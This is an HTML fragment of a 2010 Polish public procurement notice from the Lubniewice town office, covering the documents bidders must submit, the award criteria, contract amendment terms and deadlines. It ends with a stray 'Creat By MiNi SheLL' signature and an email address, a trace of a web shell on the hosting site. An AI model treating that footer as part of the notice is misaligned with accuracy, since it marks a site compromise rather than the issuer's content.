<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dowód wniesienia wadium, upoważnienie dla osoby reprezentującej Wykonawcę, o ile nie  wynika to z innych dokumentów. W przypadku zawiązania konsorcjum należy załączyć pełnomocnictwo dla podmiotu reprezentującego kilku Wykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty i określa warunki takiej zmiany tj. w przypadku zmiany ustawowej stawki podatku VAT Zamawiający dopuszcza zmianę wartości umowy, konieczność udzielenia i wykonania zamówień dodatkowych na podstawie art. 67 ust. 1 pkt. 5 ustawy Prawo zamówień publicznych, jeżeli Wykonawca w związku z wykonaniem zamówienia dodatkowego nie będzie mógł dotrzymać terminu zamówienia podstawowego, istotnej, leżącej po stronie Zamawiającego, zwłoki w przekazaniu placu budowy Wykonawcy o ilości dni opóźnienia, wystąpienia awarii nie zawinionej czynnościami lub nie wynikającej z zaniechania czynności, do których Wykonawca był zobowiązany, działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia, wystąpienie warunków pogodowych uniemożliwiających realizację zadania w terminie przy zachowaniu czynników niezbędnych do właściwego i zgodnego z technologią wykonania prac.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lubniewicach, ul. Jana Pawła II 51, 69-210 Lubniewice, pok. nr 11 na I piętrze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2010 godzina 10:00, miejsce: 24 maj 2010 r., godzina 10.00 w Urzędzie Miejskim w Lubniewicach, ul. Jana Pawła II 51, 69-210 Lubniewice - sekretariat, pok. nr 8 na I piętrze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach działania (Odnowa i Rozwój Wsi).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com